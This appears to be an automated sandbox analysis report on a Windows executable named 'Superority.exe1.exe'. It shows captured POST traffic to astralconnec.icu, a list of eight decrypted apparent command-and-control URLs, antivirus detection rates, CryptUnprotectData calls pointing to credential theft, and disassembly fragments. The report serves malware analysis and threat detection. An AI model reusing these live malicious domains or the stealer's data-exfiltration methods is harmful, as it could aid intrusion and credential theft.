Source: global traffic	HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=cMc1oHWI7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552289Host: astralconnec.icu
Source: global traffic	HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: astralconnec.icu

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: astralconnec.icu

Source: Superority.exe1.exe	Virustotal: Detection: 55%			Perma Link
Source: Superority.exe1.exe	ReversingLabs: Detection: 57%

Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: astralconnec.icu/DPowko
Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: begindecafer.world/QwdZdf
Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: garagedrootz.top/oPsoJAN
Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: modelshiverd.icu/bJhnsj
Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: arisechairedd.shop/JnsHY
Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: catterjur.run/boSnzhu
Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: orangemyther.live/IozZ
Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: fostinjec.today/LksNAz

Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041B889 CryptUnprotectData,		1_2_0041B889
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00420C7F CryptUnprotectData,		1_2_00420C7F

Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then push edi	1_2_00411055
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	1_2_0044F0D0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	1_2_0044F1F0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx-757A854Bh]	1_2_00450290
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [ecx], dx	1_2_004504E0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1D023CB4h]	1_2_00450800
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [esi], dx	1_2_0041B889
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	1_2_0041B889
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-36F469BEh]	1_2_0041B889
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000168h]	1_2_0041B889
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+04h]	1_2_0041A8B0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	1_2_0041292E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+616B0082h]	1_2_0040EABE
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then jmp ecx	1_2_0040EABE
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-0Eh]	1_2_00410B5B
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then jmp ecx	1_2_0040EBE0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+10h]	1_2_00421C80
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A566C0CEh	1_2_00421C80
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0042DD7A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-3EBE6F0Ch]	1_2_0043806A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00434032
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+10h]	1_2_00434032
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00434032
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [ecx], bl	1_2_00411151
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax+526739DEh]	1_2_00411151
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [edi], cx	1_2_0042B160
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [ebx], cl	1_2_0043919E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ebx, bx	1_2_004301A3
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [edi], dl	1_2_004371AD
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then jmp eax	1_2_0041D25D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_0040A200
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_0040A200
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then jmp eax	1_2_004202DF
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_004242A6
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00420347
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	1_2_0042137A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov eax, 31C91D1Eh	1_2_0044C3ED
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	1_2_00447390
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [edx], al	1_2_0043A45B
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-0027707Ah]	1_2_004334F2
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+10h]	1_2_00434560
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00435500
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_0042A5C0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [ecx], dl	1_2_0042459C
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax-2A3E6A48h]	1_2_0044C59B
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	1_2_00448641
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+04h]	1_2_00448641
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	1_2_00448641
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then push ebx	1_2_0041264D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0043765E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	1_2_0044F670
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+10h]	1_2_0041C6B9
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-62h]	1_2_0041C6B9
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov dword ptr [esi], edx	1_2_004386BE
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_0041B700
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041F715
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax-2A3E6A48h]	1_2_0044C712
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1005DACEh]	1_2_004107D3
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_0041A7F0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-52h]	1_2_00433857
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]	1_2_0044D850
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then push dword ptr [esp+0Ch]	1_2_00434960
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-36F469BEh]	1_2_0041B912
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000168h]	1_2_0041B912
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1D023CB4h]	1_2_004509A0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-12797E7Eh]	1_2_0042EA52
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000878h]	1_2_0042EA52
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00442A50
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov esi, edx	1_2_0041DB0B
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-12797E7Eh]	1_2_0042FB11
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000878h]	1_2_0042FB11
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h	1_2_0044ABF0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_00437BBF
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1AC89368h]	1_2_0042AC40
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	1_2_0042AC40
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00433C93
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-36F469BEh]	1_2_0041BD1D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000168h]	1_2_0041BD1D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_00437EF0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	1_2_00448F76
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	1_2_0044AF30
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 720EEED4h	1_2_0044AFF0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	1_2_0044AFF0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+465A9F5Ch]	1_2_00420F80
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041EECC

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Superority.exe1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Superority.exe1._69e57c9baf157eda2fe7e9bacb6e4947ee2fcc1f_96223681_7b5ef16b-fc02-411d-9bae-0dea8fce227e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB259.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB392.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3D2.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Superority.exe1.exe